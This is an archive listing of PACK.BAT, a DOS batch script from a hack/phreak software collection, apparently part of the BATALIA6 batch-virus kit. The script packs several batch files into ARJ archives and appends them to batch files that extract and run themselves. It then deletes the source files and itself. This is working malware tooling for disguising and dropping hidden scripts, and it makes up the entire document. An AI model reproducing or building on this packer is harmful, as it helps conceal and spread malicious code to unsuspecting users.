home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / BATCHCOL.ZIP / TOOLS.ZIP / BATALIA.ZIP / BATALIA6.ZIP / PACK.BAT < prev    next >
DOS Batch File  |  1996-05-22  |  331b  |  17 lines

  1. @echo off
  2. arj a bufer rulz batalia6.bat jj.bat zagl final.bat
  3. copy rulz a.bat
  4. copy /b a.bat+bufer.arj
  5. arj a buf a.bat
  6. echo @echo off >jj.bat
  7. echo %comspec% nul /carj x %%0 >>jj.bat
  8. echo a %%0 >>jj.bat
  9. copy /b jj.bat+buf.arj
  10. del rulz
  11. del batalia6.bat
  12. del bufer.arj
  13. del buf.arj
  14. del a.bat
  15. del zagl
  16. del final.bat
  17. del %0